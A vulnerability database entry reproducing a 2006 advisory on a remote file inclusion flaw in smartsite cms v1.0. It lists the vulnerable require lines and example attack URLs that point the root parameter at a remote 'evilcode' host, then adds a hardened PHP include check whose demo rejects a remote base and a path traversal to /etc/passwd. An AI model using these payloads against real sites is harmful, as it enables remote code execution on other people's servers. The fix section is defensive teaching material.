| CVE | Category | Price | Severity |
|---|---|---|---|
| | CWE-98 | Not specified | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Not specified | High | Remote | 2006-07-13 |

| CVSS | EPSS | EPSSP |
|---|---|---|
| CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |

smartsite cms v1.0 Remote File include
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE Arabian Security Team
-------------------------------------------------
site of script:www.smartsitecms.net
-------------------------------------------------
Vulnerable: smartsite cms v1.0
-------------------------------------------------
vulnerable code:
----------------------
1-in comment.php :
require($root . "include/inc_foot.php");
---------------------------------------
2-in /admin/comedit.php :
else {
require('../include/inc_accessfail.php');
}
?>
</div>
</div>
<?php
}
else {
require($root . "include/inc_adminfail.php");
}
---------------------------------------
3-in /admin/test.php :
require($root . "include/inc_adminfooter.php");
---------------------------------------
4-in /admin/index.php :
require($root . "admin/include/inc_adminfooter.php");
---------------------------------------
5-in /admin/include/inc_adminfoot.php:
require($root . "include/inc_footer.php");
---------------------------------------
$root parameter File include
-----------------------------------------------------------------
vulnerable files :
--------------------
comment.php
/admin/test.php
/admin/index.php
/admin/include/inc_adminfoot.php
/admin/comedit.php
-------------------------------------------------
example:
www.example.com/(path)/comment.php?root=http://evilcode.txt?
www.example.com/(path)/admin/test.php?root=http://evilcode.txt?
www.example.com/(path)/admin/index.php?root=http://evilcode.txt??root=http://evilcode.txt?
www.example.com/(path)/admin/include/inc_adminfoot.php?root=http://evilcode.txt?
www.example.com/(path)/admin/comedit.php?root=http://evilcode.txt?
--------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23 (at) hotmail (dot) com
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALM OKAN3 AND ALL LEZR.COM Member
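
A hardened form of the `require($root . ...)` pattern listed above, as an added example that is not from the advisory or from smartsite cms. It assumes `$root` reached these scripts from the query string because the scripts never assign it; `resolve_include()` and the temporary demo directory are hypothetical.

```php
<?php
// Added example, not smartsite cms code. resolve_include() and the temp
// directory are hypothetical; the include name comes from the advisory.

// Resolve $relative under $base and return a local file path, or throw.
function resolve_include(string $base, string $relative): string
{
    // realpath() only resolves local paths: a URL such as "http://..."
    // does not resolve, so a remote base fails here.
    $baseReal = realpath($base);
    if ($baseReal === false || !is_dir($baseReal)) {
        throw new RuntimeException('base is not a local directory');
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    $full = realpath($prefix . $relative);
    // Reject missing files and anything that escapes the base via "../".
    if ($full === false || !is_file($full)
        || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('include is outside the base directory');
    }
    return $full;
}

// Constructed stand-in for the application directory.
$appDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
mkdir($appDir . '/include', 0700, true);
file_put_contents($appDir . '/include/inc_foot.php', "<?php echo \"footer\\n\";\n");

// Vulnerable pattern from the advisory: $root is never assigned in the
// script, so a request value can supply it.
//   require($root . "include/inc_foot.php");

// Hardened: assign the base unconditionally from a server-side value
// (in the real script: $root = __DIR__ . '/';) before any require.
$root = $appDir . DIRECTORY_SEPARATOR;
require resolve_include($root, 'include/inc_foot.php');

// A URL base of the kind shown in the advisory's examples, and a
// traversal attempt, are both refused instead of being included.
foreach ([['http://evilcode.txt?', 'include/inc_foot.php'],
          [$root, '../../etc/passwd']] as [$base, $rel]) {
    try {
        resolve_include($base, $rel);
        echo "unexpectedly accepted\n";
    } catch (RuntimeException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Keeping `allow_url_include` set to `Off` in php.ini refuses URL includes at the interpreter level as well, independent of the path check.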